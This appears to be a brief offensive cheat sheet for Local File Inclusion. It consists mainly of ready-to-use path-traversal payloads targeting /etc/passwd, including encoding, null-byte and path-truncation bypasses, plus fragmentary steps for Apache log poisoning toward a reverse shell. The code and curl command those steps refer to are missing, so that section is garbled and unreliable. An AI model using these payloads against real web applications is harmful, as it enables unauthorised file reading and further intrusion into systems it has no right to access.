LFI

/etc/passwd

../../../etc/passwd

/../../../etc/passwd

....//....//....//etc/passwd

/..//..//..//..//..//..//etc/passwd

..%2F..%2F..%2Fetc%2Fpasswd%0A

./languages/../../../../etc/passwd

/etc/./passwd

/etc/passwd%00

/etc/passwd%00.php

?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
  • Just modify the User-Agent to "Apache Log Poisoning"

  • Then change again the User-Agent to this code

Or we could use this curl command

For reverse shell from poisoned log

Last updated